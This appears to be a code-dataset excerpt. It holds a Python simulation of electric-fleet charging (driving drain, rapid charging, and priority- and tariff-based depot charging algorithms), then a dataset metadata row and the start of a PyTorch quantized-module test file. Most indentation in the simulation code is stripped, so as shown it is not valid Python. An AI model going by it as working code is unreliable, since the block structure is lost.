# FOR CARS OUTSIDE OF DEPOT:
# * CHECK FOR CARS CURRENTLY RAPID CHARGING
# * THEN CHECK FOR CARS THAT NEED RAPID CHARGING
for row in range(len(drivingCarsDF)):
car = drivingCarsDF.index[row]
# FIND DURATION OF RAPID CHARGE IN CHUNKS
RCchunks = np.ceil(chunks/(60/RCduration))
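        # e.g. RCduration = 30 minutes with chunks = 2 gives RCchunks = 1 step of rapid charging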
# PREPARE BASE CASE FOR WHILE LOOP
chunkCount = 1
checkTime = str(time - ((dt.timedelta(hours=1/chunks))*chunkCount))
prevSimChunk = simulationDF.loc[simulationDF['time']==checkTime]
checkEvent = prevSimChunk.loc[prevSimChunk['car']==car, 'event'].to_string(index=False)
# CHECK IF CAR HAS BEEN RAPID CHARGING
while checkEvent == "RC":
chunkCount += 1
checkTime = str(time - ((dt.timedelta(hours=1/chunks))*chunkCount))
prevSimChunk = simulationDF.loc[simulationDF['time']==checkTime]
checkEvent = prevSimChunk.loc[prevSimChunk['car']==car, 'event'].to_string(index=False)
# IF CAR IS RAPID CHARGING AND REQUIRES MORE RAPID CHARGING:
if 1 < chunkCount <= RCchunks:
# APPEND TO RAPID CHARGE LIST
toRapidCharge.append(car)
# ELSE (CAR HAS NOT BEEN RAPID CHARGING), CHECK IF CAR NEEDS RAPID CHARGING
else:
# IF BATTERY < RC PERCENTAGE (INPUT), CAR NEEDS RAPID CHARGING
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
if batt < (battSize*(RCperc/100)):
# APPEND TO RAPID CHARGE LIST
toRapidCharge.append(car)
# INCREASE RAPID CHARGE COUNT
rcCount += 1
# OTHERWISE, ADD TO DON'T RAPID CHARGE LIST
else: dontRapidCharge.append(car)
# ***** FOR CARS THAT DON'T NEED RAPID CHARGING, DECREASE BATT (DRIVE) *****
for carsDontRC in range(len(dontRapidCharge)):
car = dontRapidCharge[carsDontRC]
# READ BATTERY
batt = carDataDF.loc[car, 'battkW']
# GET RANDOMISED VALUE FOR MILEAGE AND MPKW
mileage = driveDataByCar[str(car)].loc[ind, 'mileage']
mpkw = driveDataByCar[str(car)].loc[ind, 'mpkw']
# CALCULATE RATE OF BATT DECREASE
kwphr = mileage/mpkw
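        # kwphr is the battery drain in kW, assuming mileage is miles driven per hour and mpkw is miles per kWh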
# UPDATE SIMULATION ACCORDINGLY
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(-kwphr/chunks, 1),
'batt': round(batt, 1),
'event': 'drive',
'costPerCharge': 0,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# DECREASE BATTERY
batt -= kwphr/chunks
# ASSIGN BATTERY
carDataDF.loc[car,'battkW'] = batt
# ***** FOR CARS THAT NEED RAPID CHARGING, RAPID CHARGE *****
for carsToRC in range(len(toRapidCharge)):
car = toRapidCharge[carsToRC]
# READ BATTERY AND BATTERY SIZE
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
# CALCULATE BATTERY INCREASE
RCbattIncrease = 50/chunks
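        # rapid charging is modelled as a flat 50 kW supply, i.e. 50/chunks kWh added per step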
# UPDATE RAPID CHARGE COUNT AND TOTAL COST
RCcost = 0.3*(50/chunks)
totalCost += RCcost
# UPDATE SIMULATION ACCORDINGLY
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(RCbattIncrease, 1),
'batt': round(batt, 1),
'event': 'RC',
'costPerCharge': RCcost,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# RAPID CHARGE
batt += RCbattIncrease
if batt > battSize: batt = battSize
# ASSIGN BATTERY
carDataDF.loc[car,'battkW'] = batt
return carDataDF, rcCount, simulationDF, totalCost
#############################################################
# ALLOCATE AN AVAILABLE CHARGE PT OR SELECT CURRENT CHARGE PT
#############################################################
def findChargePt(carDataDF, car, chargePtDF):
# SELECT AVAILABLE CHARGE PTS
availablePts = chargePtDF.loc[chargePtDF['inUse'] != 1]
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR IS NOT ON A CHARGE PT, PLUG INTO FIRST AVAILABLE CHARGE PT
if np.isnan(chargePt) and len(availablePts) > 0:
pt = availablePts.index[0]
# print("car "+str(car)+" plugged into CP "+str(pt))
availablePts = availablePts.drop(pt, axis=0)
# UPDATE CHARGE PT DF and CAR DATA DF
chargePtDF.loc[pt, 'inUse'] = 1
carDataDF.loc[car, 'chargePt'] = pt
# IF CAR HAS A CHARGE PT, PT = CHARGE PT, ELSE PT = NAN
else:
pt = chargePt
# print("car "+str(car)+" has charge pt "+str(pt))
return pt, carDataDF, chargePtDF
###################################
# CHARGE VEHICLE FOR ONE HOUR
###################################
def charge(carDataDF, depot, simulationDF, time, chargePtDF, toChargeDF, pricesDF, company, totalCost):
# FOR EVERY CAR IN THE DEPOT
for index in range(len(depot)):
car = depot[index]
# READ IN BATTERY, BATTERY SIZE AND CHARGE RATE
batt = carDataDF.loc[car,'battkW']
battSize = carDataDF.loc[car,'battSize']
chargeRate = toChargeDF.loc[car,'chargeRate']
# FIND PRICE OF CHARGE AT TIME
# * Read in start and end times of green zone
greenStart = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEnd = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# * Read in time without date
timeHr = readTime(str(time.time()))
# IF TIME IS WITHIN GREEN ZONE, PRICE = GREEN ZONE PRICE
if readTime(greenStart) <= timeHr < readTime(greenEnd):
price = float(pricesDF.loc[pricesDF['company']==company, 'priceGreenZone'])
# ELSE, PRICE = RED ZONE PRICE
else:
price = float(pricesDF.loc[pricesDF['company']==company, 'priceRedZone'])
# CALCULATE COST OF CHARGE AND ADD THIS TO TOTAL COST
costOfCharge = (chargeRate*price)/chunks
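        # price is per kWh, so one simulation step at chargeRate kW costs (chargeRate*price)/chunks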
totalCost += costOfCharge
# DETERMINE EVENT STATUS
if chargeRate > 0:
event = "charge"
else:
if batt == battSize: event = "full"
else: event = "wait"
# APPEND DATA TO SIMULATION DATA
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(chargeRate/chunks, 1),
'batt': round(batt, 1),
'event': event,
'costPerCharge': round(costOfCharge, 1) if chargeRate > 0 else 0,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# print("CHARGE")
# INCREASE BATTERY PERCENTAGE ACCORDING TO CHARGE RATE
batt += chargeRate/chunks
batt = battSize if batt >= battSize else batt
# ASSIGN BATTERY
carDataDF.loc[car, 'battkW'] = batt
return carDataDF, simulationDF, chargePtDF, totalCost
############################################
# SYNC THE TOTAL COST COLUMN: GIVE EVERY ROW AT THIS TIME THE MAX TOTAL COST VALUE
############################################
def adjustTotalCost(time, simulationDF):
# SELECT ROWS IN SIMULATION WHERE TIME == TIME
selectRows = simulationDF.loc[simulationDF['time']==time]
# SELECT THE MAXIMUM VALUE IN THE TOTAL COST COLUMN
maxCost = selectRows['totalCost'].max()
# REPLACE EVERY OTHER TOTAL COST VALUE WITH MAXIMUM VALUE FOR THIS TIME
simulationDF.loc[simulationDF['time']==time, 'totalCost'] = maxCost
return simulationDF
#################################################################################################################################
# CORE FUNCTIONS
#################################
# INCREASE BATT DURING CHARGE
#################################
def dumbCharge(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# SELECT CARS IN DEPOT THAT ARE NOT FULLY CHARGED
needChargeDF = carDataDF.loc[(carDataDF['inDepot'] == 1) &
(carDataDF['battkW'] < carDataDF['battSize'])]
# FOR CARS IN DEPOT:
for cars in range(len(needChargeDF)):
car = needChargeDF.index[cars]
# ALLOCATE AVAILABLE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
# SELECT CARS IN DEPOT WITH VALID CHARGE PTS
chargeDF = carDataDF.loc[(carDataDF['inDepot'] == 1) &
(carDataDF['battkW'] < carDataDF['battSize']) &
(~carDataDF['chargePt'].isna())]
# IF THERE ARE CARS WITH VALID CHARGE POINTS THAT REQUIRE CHARGING
if len(chargeDF) > 0:
# SPLIT CHARGE RATE EQUALLY BETWEEN CARS THAT ARE CHARGING
if len(chargeDF) <= len(chargePtDF): splitChargeRate = availablePower/len(chargeDF)
else: splitChargeRate = availablePower/len(chargePtDF)
# CHARGE SELECTED CARS IN DEPOT
for cars in range(len(chargeDF)):
car = chargeDF.index[cars]
# LET CHARGE RATE = SPLIT CHARGE RATE
chargeRate = splitChargeRate
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# LIMIT CHARGE RATE TO MAX RATE OF CHARGE PT
maxRatePt = chargePtDF.loc[pt, 'maxRate']
if maxRatePt < chargeRate: chargeRate = maxRatePt
# IF NO CHARGE PTS AVAILABLE, DON'T CHARGE
else: chargeRate = 0
# UPDATE TO-CHARGE DF
toChargeDF.loc[car, 'chargeRate'] = chargeRate
    return carDataDF, chargePtDF, toChargeDF, totalCost
#########################################
# INCREASE BATT DURING CHARGE (LEAVETIME)
#########################################
def smartCharge_leavetime(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) > 0:
# CREATE A LIST FOR CARS AND THEIR LEAVETIMES (TIME UNTIL CAR LEAVES DEPOT)
leaveTList = []
        # ***** FIND LEAVETIMES AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
car = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME BEYOND RUN TIME
else:
lastStart = shiftsByCar[str(car)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT UNTIL CAR LEAVES AND APPEND TO LIST
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
leaveTList.append([car, hrsLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT *****
leaveTimes = pd.DataFrame.from_records(leaveTList, columns=['car','hrsLeft'])
leaveTimes = leaveTimes.sort_values(by=['hrsLeft'])
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** CHARGE CARS IN SORTED ORDER *****
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT:
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE THE ENERGY LEFT IF CAR WAS CHARGED AT MAX
energyLeft = availablePower - maxRate
# IF THERE IS ENOUGH ENERGY FOR MAX RATE, CHARGE CAR AT MAX
if energyLeft >= 0:
chargeRate = maxRate
# IF THERE ISN'T ENOUGH FOR MAX RATE, CHARGE USING REMAINING POWER
elif energyLeft < 0 and energyLeft > -maxRate:
chargeRate = availablePower
# IF VEHICLE IS PLUGGED IN BUT NOT ALLOCATED CHARGE
else:
chargeRate = 0
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
# ADJUST AVAILABLE POWER
availablePower -= chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
######################################
# INCREASE BATT DURING CHARGE (BATT)
######################################
def smartCharge_batt(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR BATT NEEDED
battNeededList = []
        # ***** FOR ALL CARS, FIND BATT NEEDED UNTIL FULLY CHARGED *****
for cars in range(0, len(depot)):
carNum = depot[cars]
# CALCULATE BATTERY NEEDED AND APPEND TO LIST
battLeft = abs(carDataDF.loc[carNum,'battSize']-carDataDF.loc[carNum,'battkW'])
battNeededList.append([carNum, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT *****
battNeeded = pd.DataFrame.from_records(battNeededList, columns=['car','battLeft'])
battNeeded = battNeeded.sort_values(by=['battLeft'], ascending=False)
battNeeded = battNeeded.reset_index(drop=True)
# ***** CHARGE CARS IN SORTED ORDER *****
for row in range(0, len(battNeeded)):
# READ IN DATA FOR SELECTED CAR
car = battNeeded.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE THE ENERGY LEFT IF CAR WAS CHARGED AT MAX
energyLeft = availablePower - maxRate
# IF THERE IS ENOUGH ENERGY FOR MAX RATE, CHARGE CAR AT MAX
if energyLeft >= 0:
chargeRate = maxRate
# IF THERE ISN'T ENOUGH FOR MAX RATE, CHARGE USING REMAINING POWER
elif energyLeft < 0 and energyLeft > -maxRate:
chargeRate = availablePower
# IF VEHICLE IS PLUGGED IN BUT NOT ALLOCATED CHARGE
else:
chargeRate = 0
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
# ADJUST AVAILABLE POWER
availablePower -= chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
###########################################
# INCREASE BATT DURING CHARGE (SUPER SMART)
###########################################
# PRIORITY = BATT NEEDED/TIME LEFT IN DEPOT
# CHARGE RATE = (PRIORITY/SUM OF ALL PRIORITIES)*AVAILABLE POWER
def smartCharge_battOverLeavetime(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR LEAVETIMES AND BATT NEEDED
priorityRows = []
# ***** FIND LEAVETIMES AND BATT NEEDED AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
car = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME
else:
lastStart = shiftsByCar[str(car)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT AND BATT NEEDED
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
battLeft = carDataDF.loc[car,'battSize']-carDataDF.loc[car,'battkW']
# LET PRIORITY = BATT LEFT/TIME LEFT, APPEND TO LIST
priorityRows.append([car, battLeft/hrsLeft, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT BY PRIORITY *****
leaveTimes = pd.DataFrame.from_records(priorityRows, columns=['car','priority','battLeft'])
leaveTimes = leaveTimes.sort_values(by=['priority'], ascending=False)
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** IN SORTED ORDER, CALCULATE PRIORITY RATIO AND CHARGE *****
# CALCULATE THE SUM OF PRIORITY VALUES
prioritySum = sum(leaveTimes.priority)
# FOR EVERY CAR:
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
battLeft = leaveTimes.loc[row, 'battLeft']
priority = leaveTimes.loc[row, 'priority']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE CHARGE RATE USING PRIORITY/SUM OF PRIORITIES
chargeRate = (priority/prioritySum)*availablePower
# IF CHARGE RATE EXCEEDS MAX RATE:
if chargeRate > maxRate: chargeRate = maxRate
# IF CHARGE RATE EXCEEDS CHARGE NEEDED:
if chargeRate > battLeft*chunks: chargeRate = battLeft*chunks
# ADJUST REMAINING AVAILABLE POWER AND PRIORITY SUM
availablePower -= chargeRate
prioritySum -= priority
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
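# Worked example (illustrative figures): two cars needing 10 kWh and 5 kWh, leaving in
# 2 h and 5 h, get priorities 5 and 1; with 7 kW available the first is offered
# (5/6)*7 ~= 5.8 kW and the second the remaining ~1.2 kW, each capped by its charge
# point's max rate and by the charge it still needs.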
##############################################
# INCREASE BATT DURING CHARGE (COST SENSITIVE)
##############################################
# PRIORITY = BATT NEEDED/TIME LEFT IN DEPOT
# IF CAR WILL CHARGE OVER GREEN ZONE:
#   DELAY CHARGING UNTIL THE GREEN ZONE STARTS (PRIORITY = 0)
# CHARGE RATE = (PRIORITY/SUM OF ALL PRIORITIES)*AVAILABLE POWER
def costSensitiveCharge(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR LEAVETIME AND BATT NEEDED
priorityRows = []
# ***** CALCULATE PRIORITY FOR EACH CAR AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
carNum = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[carNum, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(carNum)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = readTime(shiftsByCar[str(carNum)].loc[shiftIndex+1, 'startShift'])
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME
else:
lastStart = shiftsByCar[str(carNum)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT AND BATT NEEDED
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
battLeft = carDataDF.loc[carNum,'battSize']-carDataDF.loc[carNum,'battkW']
prior = battLeft/hrsLeft
# ***** DELAY CHARGING FOR CARS THAT ARE IN DEPOT DURING THE GREEN ZONE *****
# READ IN START AND END TIMES OF GREEN ZONE
greenStartHr = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEndHr = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# IF GREEN ZONE RUNS OVERNIGHT:
if (readTime(greenStartHr) > readTime(greenEndHr)):
# GREEN START = CURRENT DAY + GREEN ZONE START TIME
greenStart = readTime(str(time.date()) + " " + greenStartHr)
# GREEN END = NEXT DAY + GREEN END TIME
greenEnd = readTime(str(time.date() + dt.timedelta(days=1)) + " " + greenEndHr)
# IF GREEN ZONE DOESN'T RUN OVERNIGHT, CONSIDER CASE WHERE TIME IS PAST MIDNIGHT
else:
# CALCULATE DIFFERENCE GREEN ZONE START TIME AND MIDNIGHT
arbGreenStart = dt.datetime.combine(dt.date.today(), readTime(greenStartHr))
arbMidnight = dt.datetime.combine(dt.date.today(), readTime("00:00:00"))
gap = arbGreenStart - arbMidnight
# GREEN START = (TIME-GAP) + 1 DAY + GREEN ZONE START TIME
greenStart = readTime(str((time-gap).date() + dt.timedelta(days=1)) + " " + greenStartHr)
# GREEN END = (TIME-GAP) + 1 DAY + GREEN ZONE END TIME
greenEnd = readTime(str((time-gap).date() + dt.timedelta(days=1)) + " " + greenEndHr)
# IF GREEN ZONE HASN'T STARTED YET,
# AND IF CAR WILL BE CHARGING THROUGHOUT WHOLE OF GREEN ZONE:
if (time < greenStart) and (nextStart >= greenEnd):
# DELAY CHARGING UNTIL GREEN ZONE
prior = 0.0
# LET PRIORITY = BATTLEFT/TIME LEFT, APPEND TO LIST
priorityRows.append([carNum, prior, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT BY PRIORITY *****
leaveTimes = pd.DataFrame.from_records(priorityRows, columns=['car','priority','battLeft'])
leaveTimes = leaveTimes.sort_values(by=['priority'], ascending=False)
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** IN SORTED ORDER, CALCULATE PRIORITY RATIO AND CHARGE *****
# CALCULATE THE SUM OF PRIORITY VALUES
prioritySum = sum(leaveTimes.priority)
# FOR EVERY CAR:
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
battLeft = leaveTimes.loc[row, 'battLeft']
priority = leaveTimes.loc[row, 'priority']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE CHARGE RATE USING PRIORITY/SUM OF PRIORITIES
if prioritySum == 0.0: chargeRate = 0
else: chargeRate = (priority/prioritySum)*availablePower
# IF CHARGE RATE EXCEEDS MAX RATE:
if chargeRate > maxRate: chargeRate = maxRate
# IF CHARGE RATE EXCEEDS CHARGE NEEDED:
if chargeRate > battLeft*chunks: chargeRate = battLeft*chunks
# ADJUST REMAINING AVAILABLE POWER AND PRIORITY SUM
availablePower -= chargeRate
prioritySum -= priority
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
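# e.g. with a green zone of 23:00-06:00 (illustrative), a car parked at 20:00 whose next
# shift starts after 06:00 the next day is held at priority 0 -- and so not charged --
# until the green zone begins, then charges on the cheaper tariff.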
#################################################################################################################################
############################################
# RUN SIMULATION FROM SEPARATE FILE
############################################
def runSimulation(startTime, runTime, RCduration, RCperc,
fleetData, driveDataDF, allShiftsDF, pricesDF, company,
algo):
# INITIALISE MAIN DATAFRAMES WITH DATA AT START TIME
# Get data from csv inputs
carData, chargePtData = getLists(fleetData)
# Choose column names
carCols = ["battkW","inDepot","battSize","chargePt","shiftIndex","latestStartShift","latestEndShift"]
cpCols = ["maxRate","inUse"]
simCols = ["time","car","chargeDiff","batt","event","costPerCharge","totalCost"]
tcCols = ["car","chargeRate"] # Columns for cars that need to charge and the
# rate at which they will charge given by the algorithm
# Initialise dataframes
carDataDF = pd.DataFrame.from_records(carData, columns=carCols)
chargePtDF = pd.DataFrame.from_records(chargePtData, columns=cpCols)
simulationDF = pd.DataFrame(columns=simCols)
# Create rows for every car in toChargeDF
toChargeDFrows = []
for i in range(len(carDataDF)):
toChargeDFrows.append([i, 0])
# Initialise toChargeDF
toChargeDF = pd.DataFrame(toChargeDFrows, columns=tcCols)
# APPEND CARS INTO DEPOT AT START TIME
depot = []
for car in range(0, len(carDataDF)):
if carDataDF.loc[car,'inDepot']: depot.append(car)
# CREATE LIBRARY FOR SHIFTS BY CAR
shiftsByCar = unpackShifts(carDataDF, allShiftsDF)
# CREATE LIBRARY FOR DRIVING DATA
driveDataByCar = {}
for car in range(0, len(carDataDF)):
findData = driveDataDF.loc[driveDataDF['car']==car]
dataNoIndex = findData.reset_index(drop=True)
driveDataByCar['%s' % car] = dataNoIndex
# RETRIEVE AVAILABLE POWER FROM FLEET DATA
availablePower = getData(fleetData, 'availablePower')
rcCount = 0 # INITIALISE A COUNTER FOR RAPID CHARGES
totalCost = 0 # INITIALISE A COUNTER FOR TOTAL COST
time = startTime # CHOOSE START TIME
# RUN SIMULATION FOR ALL OF RUN TIME
for i in range(0, runTime*chunks):
# print("*****" + str(time))
# INITIALISE A VARIABLE TO CHECK FOR EVENT CHANGES
eventChange = False
# *** RUN FUNCTIONS THAT INCLUDE WILL RECOGNISE CHANGES IN EVENTS ***
carDataDF, depot, chargePtDF, toChargeDF, eventChange = inOutDepot(carDataDF, shiftsByCar, time, depot, chargePtDF, toChargeDF, eventChange)
toChargeDF, eventChange = readFullBattCars(carDataDF, simulationDF, toChargeDF, time, totalCost, eventChange)
eventChange = readTariffChanges(time, pricesDF, company, eventChange)
# *** RUN FUNCTIONS AFFECTING CARS OUTSIDE THE DEPOT ***
# DECREASE BATT/RAPID CHARGE CARS OUTSIDE THE DEPOT
carDataDF, rcCount, simulationDF, totalCost = driving(carDataDF, time, rcCount, RCduration, RCperc, simulationDF, driveDataByCar, i, totalCost)
# *** RUN FUNCTIONS AFFECTING CARS IN THE DEPOT ***
# IF THERE IS AN EVENT, RUN CHARGING ALGORITHM
if eventChange == True:
carDataDF, chargePtDF, toChargeDF, totalCost = algo(carDataDF, depot, shiftsByCar, time, availablePower, simulationDF, chargePtDF, toChargeDF, pricesDF, company, totalCost)
# CHARGE/READ WAITING CARS IN THE DEPOT
carDataDF, simulationDF, chargePtDF, totalCost = charge(carDataDF, depot, simulationDF, time, chargePtDF, toChargeDF, pricesDF, company, totalCost)
# FORMAT TOTAL COST COLUMN IN SIMULATION DF
simulationDF = adjustTotalCost(time, simulationDF)
# INCREMENT TIME OF SIMULATION
time = incrementTime(time)
# print("\n")
# print("No. of rapid charges: " + str(rcCount))
# FORMAT FINAL SIMULATION DF FOR VIEWING OR ANIMATION
sim = dfFunction(simulationDF, 'car')
return styleDF(sim), simulationDF # second dataframe, 'sim', is for animation purposes
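# Hedged usage sketch (not part of the original module): the csv file names,
# the numeric arguments and the `algo` function passed in are assumptions for
# illustration only; runSimulation just requires the signature shown above.
def exampleRun(startTime, company, algo):
    import pandas as pd
    fleetData = pd.read_csv("fleetData.csv")       # assumed input file
    driveDataDF = pd.read_csv("driveData.csv")     # assumed input file
    allShiftsDF = pd.read_csv("shifts.csv")        # assumed input file
    pricesDF = pd.read_csv("prices.csv")           # assumed input file
    return runSimulation(startTime, 24, 30, 20,
                         fleetData, driveDataDF, allShiftsDF, pricesDF,
                         company, algo)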
| [
"[email protected]"
] | |
c1f7f5a8fdcb8e87bf303027ecd2d3053561bdfd | abb64b652cf908aaa17257464a12395b014b6093 | /test/test_quantized_nn_mods.py | 7203fb371c6255be2b47c7441de524a677698d85 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | beifangfazhanlu/pytorch | 8a1c5a4a11b29da26af4d3839aff0ca22e4a298a | b7d992eb46a1e085d2b8b7f0df9817bf569616d3 | refs/heads/master | 2020-07-13T15:43:26.647301 | 2019-08-29T05:18:56 | 2019-08-29T05:20:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,424 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import torch.nn.quantized as nnq
import torch.nn.quantized.dynamic as nnqd
import torch.nn._intrinsic.quantized as nnq_fused
import torch.nn.quantized.functional as qF
from torch.nn.quantized.modules import Conv2d
from torch.nn._intrinsic.quantized import ConvReLU2d
import torch.quantization
from common_utils import run_tests, tempfile
from common_quantization import QuantizationTestCase, no_deadline, prepare_dynamic
from common_quantized import _calculate_dynamic_qparams
from hypothesis import given
from hypothesis import strategies as st
import unittest
'''
Note that the tests in this file are just API tests, to make sure we wrapped the
quantized operator implementations correctly in the user-facing APIs; these are
not correctness tests for the underlying quantized operators. For correctness
tests please see `caffe2/test/test_quantized.py`.
'''
class FunctionalAPITest(QuantizationTestCase):
def test_relu_api(self):
X = torch.arange(-5, 5, dtype=torch.float)
scale = 2.0
zero_point = 1
qX = torch.quantize_linear(X, scale=scale, zero_point=zero_point, dtype=torch.quint8)
qY = torch.relu(qX)
qY_hat = qF.relu(qX)
self.assertEqual(qY, qY_hat)
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
use_bias=st.booleans(),
)
def test_conv_api(self, use_bias):
"""Tests the correctness of the conv module.
The correctness is defined against the functional implementation.
"""
